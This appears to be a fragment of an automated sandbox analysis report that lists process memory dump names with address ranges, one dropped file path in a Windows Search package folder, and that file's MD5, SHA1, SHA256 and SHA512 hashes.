memory/3920-3643-0x00007FF786360000-0x00007FF786752000-memory.dmp
memory/3160-3642-0x00007FF7261D0000-0x00007FF7265C2000-memory.dmp
memory/2016-3635-0x00007FF6289F0000-0x00007FF628DE2000-memory.dmp
memory/1948-3634-0x00007FF780B30000-0x00007FF780F22000-memory.dmp
memory/1928-3671-0x00007FF79CB60000-0x00007FF79CF52000-memory.dmp
memory/3316-3673-0x00007FF79BBB0000-0x00007FF79BFA2000-memory.dmp
memory/2948-3675-0x00007FF674EC0000-0x00007FF6752B2000-memory.dmp
memory/60-3681-0x00007FF78DE10000-0x00007FF78E202000-memory.dmp
memory/2956-3683-0x00007FF7BD750000-0x00007FF7BDB42000-memory.dmp
memory/788-3699-0x00007FF7E2220000-0x00007FF7E2612000-memory.dmp
memory/2664-3687-0x00007FF6B0EE0000-0x00007FF6B12D2000-memory.dmp
memory/1444-3702-0x00007FF7AA510000-0x00007FF7AA902000-memory.dmp
memory/3756-3705-0x00007FF717650000-0x00007FF717A42000-memory.dmp
memory/4880-3703-0x00007FF713260000-0x00007FF713652000-memory.dmp
memory/3724-3685-0x00007FF64DD60000-0x00007FF64E152000-memory.dmp
memory/960-3679-0x00007FF721660000-0x00007FF721A52000-memory.dmp
memory/2960-3677-0x00007FF63A600000-0x00007FF63A9F2000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\LH3V79HX\microsoft.windows[1].xml
| MD5 | de1306e442e8f8a902d2623363175928 |
| SHA1 | d5b28352c742e56b522112dbea4b9dd50bb26721 |
| SHA256 | 34f21a5c66749b3afe1a5f2a9fbfb0b34084c19cd7b576ef854778b795bc1af8 |
| SHA512 | b727a28ac0640130790fd0bc43229dec8c1e8ec3170131ab7434339dc6171f5a5c6c31276439354f203bbb42b37d8771fbd991cc280acef4e0756acc161a926d |